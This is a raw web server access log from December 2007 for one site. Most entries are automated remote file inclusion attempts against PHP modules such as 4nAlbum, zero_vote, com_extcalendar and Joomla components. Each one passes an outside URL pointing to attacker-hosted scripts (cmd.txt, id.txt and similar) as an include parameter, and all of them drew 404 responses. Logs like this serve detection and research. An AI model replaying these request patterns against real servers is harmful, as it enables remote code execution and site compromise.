70.86.24.154 - - [27/Dec/2007:12:43:32 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.24.154 - - [27/Dec/2007:12:43:32 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.168.186 - - [27/Dec/2007:12:45:43 -0800] "GET /logs/access_071216.log//modules/4nAlbum/public/displayCategory.php?basepath=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [27/Dec/2007:12:45:43 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [27/Dec/2007:12:45:44 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:12:46:34 -0800] "GET /retreat1/work/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.9.145.107 - - [27/Dec/2007:12:47:47 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.159.26.118 - - [27/Dec/2007:12:49:14 -0800] "GET //includes/lang/language.php?path_to_root=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
67.159.26.118 - - [27/Dec/2007:12:49:14 -0800] "GET /logs//includes/lang/language.php?path_to_root=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:12:50:26 -0800] "GET /logs/access_071212.log//skin/zero_vote/error.php?dir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.32.2.242 - - [27/Dec/2007:12:51:05 -0800] "GET /logs/access_071215.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.188.218.110 - - [27/Dec/2007:12:53:29 -0800] "GET /logs/access_071215.log/convert/mvcw.php?step=1&vwar_root=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.188.218.110 - - [27/Dec/2007:12:53:29 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.188.218.110 - - [27/Dec/2007:12:53:48 -0800] "GET /logs/access_071129.log/convert/mvcw.php?step=1&vwar_root=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.250.148.60 - - [27/Dec/2007:12:56:45 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.menschenrechtsstadt.at/ol/info.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.164.201.47 - - [27/Dec/2007:12:57:19 -0800] "GET /logs/access_071216.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.164.201.47 - - [27/Dec/2007:12:57:20 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.164.201.47 - - [27/Dec/2007:12:57:21 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.145.107 - - [27/Dec/2007:12:59:38 -0800] "GET /logs/access_071216.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [27/Dec/2007:12:59:38 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [27/Dec/2007:13:00:39 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [27/Dec/2007:13:00:45 -0800] "GET /convert/mvcw.php?vwar_root=http://www.permaya.org/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [27/Dec/2007:13:02:02 -0800] "GET /convert/mvcw.php?vwar_root=http://www.permaya.org/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [27/Dec/2007:13:02:13 -0800] "GET /convert/mvcw.php?vwar_root=http://www.permaya.org/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [27/Dec/2007:13:03:44 -0800] "GET ///skin/zero_vote/setup.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:13:11:39 -0800] "GET /megumi/?D=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.7.73 - - [27/Dec/2007:13:13:08 -0800] "GET /logs/access_071017.log HTTP/1.0" 200 21727 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.62.12.248 - - [27/Dec/2007:13:14:28 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=uid=8026(ropczyce)%20gid=65532%20groups=65532%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [27/Dec/2007:13:14:34 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:13:15:41 -0800] "GET /megumi/?N=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.220.212.155 - - [27/Dec/2007:13:18:31 -0800] "GET ///skin/zero_vote/setup.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.220.212.155 - - [27/Dec/2007:13:18:31 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.116.187.14 - - [27/Dec/2007:13:18:42 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://beginwithyou.net/na3/image/memo_up.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
64.92.163.210 - - [27/Dec/2007:13:19:03 -0800] "GET /logs/access_071216.log//modules/4nAlbum/public/displayCategory.php?basepath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.92.163.210 - - [27/Dec/2007:13:19:03 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.92.163.210 - - [27/Dec/2007:13:19:03 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.92.163.210 - - [27/Dec/2007:13:19:08 -0800] "GET /logs/access_071216.log//modules/4nAlbum/public/displayCategory.php?basepath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.92.163.210 - - [27/Dec/2007:13:19:08 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.92.163.210 - - [27/Dec/2007:13:19:08 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.250.148.60 - - [27/Dec/2007:13:21:12 -0800] "GET /logs/access_071216.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.menschenrechtsstadt.at/ol/info.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.250.148.60 - - [27/Dec/2007:13:21:13 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.menschenrechtsstadt.at/ol/info.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [27/Dec/2007:13:22:35 -0800] "GET ///skin/zero_vote/setup.php?dir=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.73.67 - - [27/Dec/2007:13:22:43 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.73.34.76 - - [27/Dec/2007:13:22:46 -0800] "GET /logs/access_071216.log//modules/4nAlbum/public/displayCategory.php?basepath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.73.34.76 - - [27/Dec/2007:13:22:46 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.73.34.76 - - [27/Dec/2007:13:22:46 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.116.187.14 - - [27/Dec/2007:13:24:30 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://beginwithyou.net/na3/image/memo_up.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
194.116.187.14 - - [27/Dec/2007:13:24:30 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://beginwithyou.net/na3/image/memo_up.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
207.58.134.215 - - [27/Dec/2007:13:25:02 -0800] "GET /logs/access_071215.log/convert/mvcw.php?vwar_root=http://www.permaya.org/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [27/Dec/2007:13:25:02 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.permaya.org/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [27/Dec/2007:13:25:16 -0800] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://www.permaya.org/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [27/Dec/2007:13:26:24 -0800] "GET /logs/access_071215.log/convert/mvcw.php?vwar_root=http://www.permaya.org/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [27/Dec/2007:13:26:24 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.permaya.org/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [27/Dec/2007:13:26:40 -0800] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://www.permaya.org/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [27/Dec/2007:13:27:09 -0800] "GET /logs/access_071215.log/convert/mvcw.php?vwar_root=http://www.permaya.org/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [27/Dec/2007:13:27:09 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.permaya.org/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [27/Dec/2007:13:27:22 -0800] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://www.permaya.org/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.62.12.248 - - [27/Dec/2007:13:27:30 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [27/Dec/2007:13:27:33 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=uid=8026(ropczyce)%20gid=65532%20groups=65532%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.73.67 - - [27/Dec/2007:13:28:13 -0800] "GET /logs/access_071212.log/skin/zero_vote/setup.php?dir=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.73.67 - - [27/Dec/2007:13:28:13 -0800] "GET /logs/access_071212.log///skin/zero_vote/setup.php?dir=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.73.67 - - [27/Dec/2007:13:28:13 -0800] "GET /logs/skin/zero_vote/setup.php?dir=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.73.67 - - [27/Dec/2007:13:28:13 -0800] "GET /logs///skin/zero_vote/setup.php?dir=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.234.6 - - [27/Dec/2007:13:37:03 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bmssounds.de/malzfreunde/joomla/components/com_simpleboard/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
207.44.234.6 - - [27/Dec/2007:13:37:03 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bmssounds.de/malzfreunde/joomla/components/com_simpleboard/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
216.130.161.174 - - [27/Dec/2007:13:37:57 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.130.161.174 - - [27/Dec/2007:13:37:57 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.130.161.187 - - [27/Dec/2007:13:37:57 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.130.161.174 - - [27/Dec/2007:13:37:57 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.130.161.189 - - [27/Dec/2007:13:37:57 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.161.187 - - [27/Dec/2007:13:37:57 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.130.161.189 - - [27/Dec/2007:13:37:57 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.161.187 - - [27/Dec/2007:13:37:57 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.130.161.189 - - [27/Dec/2007:13:37:57 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.165.125.228 - - [27/Dec/2007:13:38:33 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.165.125.228 - - [27/Dec/2007:13:38:33 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.165.125.228 - - [27/Dec/2007:13:38:33 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.32.92.82 - - [27/Dec/2007:13:39:30 -0800] "GET //skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.110.169 - - [27/Dec/2007:13:40:49 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
208.76.110.169 - - [27/Dec/2007:13:41:09 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
194.116.187.14 - - [27/Dec/2007:13:41:59 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://beginwithyou.net/na3/image/memo_up.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.32.92.82 - - [27/Dec/2007:13:43:50 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://www.bmssounds.de/malzfreunde/joomla/components/com_simpleboard/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
150.164.55.19 - - [27/Dec/2007:13:44:05 -0800] "GET /logs/access_071215.log/modifyform.html?code=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.164.55.19 - - [27/Dec/2007:13:44:05 -0800] "GET /modifyform.html?code=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.164.55.19 - - [27/Dec/2007:13:44:05 -0800] "GET /logs/modifyform.html?code=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.110.169 - - [27/Dec/2007:13:44:11 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
208.76.110.169 - - [27/Dec/2007:13:44:13 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.194.173.36 - - [27/Dec/2007:13:44:21 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.golovaliyiz.com/yedek/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.32.92.82 - - [27/Dec/2007:13:44:57 -0800] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.bmssounds.de/malzfreunde/joomla/components/com_simpleboard/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
74.208.68.5 - - [27/Dec/2007:13:44:58 -0800] "GET /logs/access_071215.log/convert/mvcw.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.68.5 - - [27/Dec/2007:13:44:59 -0800] "GET /convert/mvcw.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.68.5 - - [27/Dec/2007:13:44:59 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.68.5 - - [27/Dec/2007:13:45:32 -0800] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.100.1.165 - - [27/Dec/2007:13:46:24 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.125.219 - - [27/Dec/2007:13:46:26 -0800] "GET /logs/access_071124.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.125.219 - - [27/Dec/2007:13:46:27 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.125.219 - - [27/Dec/2007:13:46:27 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.162.122 - - [27/Dec/2007:13:48:09 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.filmforum.pl//modules/My_eGallery/public/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
81.169.162.122 - - [27/Dec/2007:13:48:15 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.filmforum.pl//modules/My_eGallery/public/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
74.6.27.101 - - [27/Dec/2007:13:48:45 -0800] "GET /retreat1/?S=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.22.125.219 - - [27/Dec/2007:13:50:05 -0800] "GET /logs/access_071214.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.70 - - [27/Dec/2007:13:50:07 -0800] "GET /logs/access_071128.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.22.125.219 - - [27/Dec/2007:13:50:43 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.135.132 - - [27/Dec/2007:13:52:32 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.filmforum.pl//modules/My_eGallery/public/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
69.90.135.132 - - [27/Dec/2007:13:52:32 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.filmforum.pl//modules/My_eGallery/public/me.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
208.100.1.165 - - [27/Dec/2007:13:57:22 -0800] "GET /logs/access_071215.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.100.1.165 - - [27/Dec/2007:13:57:22 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
